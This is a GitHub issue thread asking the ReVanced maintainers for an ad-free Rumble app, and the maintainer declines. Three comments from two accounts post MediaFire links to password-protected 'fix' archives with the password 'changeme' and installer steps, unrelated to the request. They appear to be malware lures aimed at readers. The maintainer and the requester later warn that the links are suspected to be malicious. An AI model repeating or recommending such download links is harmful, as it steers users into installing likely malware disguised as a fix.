### ISSUE TITLE
Feature request: adding Rumble with no ads

### ISSUE THREAD

**Issue by Cryptnym** [revancedapps/revanced.net#30]
Please could you look into doing a version of Rumble without ads?
Rumble is fast becoming the "Youtube" that supports free speech and no censorship.
But like Youtube the constant ads let it down.
Thanks in advance.

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by revancedapps** [comment]
Hi Cryptnym,

Currently, we don't have a Revanced version for Rumble, as its functions are completely different from YouTube app.
Also, I received an email about a comment with a mediafire link from Mohamed Ibrahim, but it seems he deleted it. I suspect it might have been a bad link, so please don't download anything from it.

![image](https://github.com/user-attachments/assets/8ffa2f69-7791-4efd-a7d0-03d8f5cc1517)

**Comment by Cryptnym** [comment]
Hi,

Thanks for the response, i also suspected the link as being malicious which is why i questioned it too.
There was someone else that dropped a similar link (a second one) from mediafire which i ignored.
That being said, i hope some day you will consider creating a version of Revanced Rumble when you can.
Kind Regards.
